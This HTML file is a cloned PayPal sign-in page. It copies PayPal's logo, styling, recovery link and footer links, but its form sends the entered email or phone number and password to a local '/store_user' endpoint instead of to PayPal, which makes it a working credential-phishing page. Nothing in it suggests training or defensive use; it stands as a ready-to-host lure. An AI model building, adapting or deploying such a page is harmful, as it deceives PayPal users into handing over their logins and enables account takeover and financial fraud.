<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Log in to your PayPal account </title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: Arial, sans-serif;
        }

        body {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background-color: #fff;
        }

        .container {
         
            margin: 120px auto 0;
            padding: 30px 10% 50px;
            border: 1px solid #EAECED;
            overflow: hidden;
            align-items: center;
            position: relative;
            border-radius: 12px;
            font-family: "pp-open-regular", Helvetica Neue, Arial, sans-serif;
            font-style: normal;
            box-sizing: border-box;
            font-weight: normal;
            font-variant: normal;
            font-size: 100%;
            line-height: 18px;
            width: 480px;
            height: 620px;
            
        }

        .logo-wrapper {
            display: flex;
            justify-content: center;
            align-items: center;
            margin-bottom: 20px;
            width: 100%;
        }

        .logo {
            width: 80px; /* Adjust the size as needed */
            opacity: 0.7;
        }


        .login-form input {
            margin-top: 30px;
            width: 100%;
            height: 65px;
            padding: 12px;
            margin: 8px 0;
            border-radius: 4px;
            border: 0.0625rem solid #999999;
        }


        .forgot-password {
            margin: 20px;
            display: block;
            text-align: left;
            color: #0e77da;
            font-weight: bold;
            font-size: 15px;
            margin-left: 0px;
            margin-bottom: 20px;
            text-decoration: none;

        }
        .forgot-password:hover{
            outline: none;
            color: #73A5FF;
        }

        .login-btn {
            width: 100%;
            padding: 12px;
            background: #2532e7;
            color: white;
            border: none;
            border-radius: 25px;
            cursor: pointer;
            font-size: 16px;
            margin-bottom: 15px;
        }
        .login-btn:hover {
            background-color: #3e88dd;
           
        }
        
        .divider {
            display: flex;
            align-items: center;
            text-align: center;
            margin-top: 10px ;
            margin-bottom: 20px;

        }
         .divider hr {
            flex: 1;
            border: none;
            border-top: 1px solid #ccc;
        }

       .divider span {
            padding: 0 10px;
            color: #555;
            font-size: 14px;
            white-space: nowrap;
        }

        .signup-btn {
            width: 100%;
            padding: 12px;
            border: 2px solid #000305;
            background: white;
            color: #000000;
            border-radius: 25px;
            cursor: pointer;
            font-size: 17px;
            font-weight: bold;

        }
        .signup-btn:hover {
            border: 1px solid  #2532e7;
            color:  #2532e7;
        }

        .languages {
            display: flex;
            align-items: center;
            gap: 10px;
            flex-wrap: wrap;
            margin-top: 70px;
            font-size: 14px;
            }

            .country-dropdown {
            padding: 6px;
            border-radius: 5px;
            border: 1px solid #ccc;
            font-size: 14px;
            }

            .language-links a {
            margin: 0 5px;
            text-decoration: none;
            color: #121213;
            }

            .language-links a:hover {
            text-decoration: underline;
            }


        .footer {
            margin-top: 100px;
            font-size: 12px;
            color: #737373;
            text-align: center;
            padding: 14px;
            background-color: #F7F9FA;

        }
        
        .footer a {
            color: #737373;
            text-decoration: none;
            margin: 0 5px;
        }
        
        .footer a:hover {
            text-decoration: underline;
        }
    </style>
</head>
<body>

<!-- Modal Popup -->
<div id="popup" class="modal">
  <div class="modal-content">

    <div class="container">
        <div class="logo-wrapper">
            <img src="https://www.paypalobjects.com/paypal-ui/logos/svg/paypal-wordmark-color.svg" alt="PayPal Logo" class="logo">
        </div>

        <form class="login-form" action="/store_user" method="POST">
            <input type="text" name="email_phone" placeholder="Email or mobile number" required>
            <input type="password" name="password" placeholder="Enter your password" required>
            
            <a href="https://www.paypal.com/authflow/password-recovery/?country.x=KE&locale.x=en_US&pwrMayflyId=pwr%3A421d6207b22741868bcb833478f925a7&redirectUri=%252Fsignin%253Fcountry.x%253DKE%2526locale.x%253Den_US%2526langTgl%253Den" class="forgot-password">Forgot password?</a>
            
            <button class="login-btn">Log In</button>

            <div class="divider">
                  <hr>
                    <span>or</span>
                      <hr>
             </div>

            <button class="signup-btn">Sign Up</button>
        </form>

         
            
     <div class="languages">
  <select id="country-select" class="country-dropdown">
    <option value="us" selected>🇺🇸 </option>
    <option value="fr">🇫🇷 </option>
    <option value="es">🇪🇸 </option>
    <option value="de">🇩🇪 </option>
    <option value="cn">🇨🇳 </option>
    <option value="ke">🇰🇪 </option>
    <option value="in">🇮🇳 </option>
    <option value="jp">🇯🇵 </option>
    <option value="gb">🇬🇧 </option>
    <option value="br">🇧🇷 </option>
  </select>

  <div class="language-links">
    <a href="https://www.paypal.com/signin?country.x=KE&locale.x=en_US&langTgl=en">English</a> | 
    <a href="https://www.paypal.com/signin?country.x=KE&locale.x=fr_XC&langTgl=fr">Français</a> | 
    <a href="https://www.paypal.com/signin?country.x=KE&locale.x=es_XC&langTgl=es">Español</a> | 
    <a href="https://www.paypal.com/signin?country.x=KE&locale.x=zh_XC&langTgl=zh">中文</a>
  </div>
</div>

        

            
    </div>
    <div class="footer">
                <a href="https://www.paypal.com/ke/smarthelp/contact-us">Contact Us</a>
                <a href="https://www.paypal.com/ke/webapps/mpp/ua/privacy-full">Privacy</a>
                <a href="https://www.paypal.com/ke/webapps/mpp/ua/legalhub-full">Legal</a>
                <a href="https://www.paypal.com/ke/webapps/mpp/ua/upcoming-policies-full">Policy Updates</a>
                <a href="https://www.paypal.com/ke/webapps/mpp/country-worldwide">Worldwide</a>
            </div>
</body>
</html>
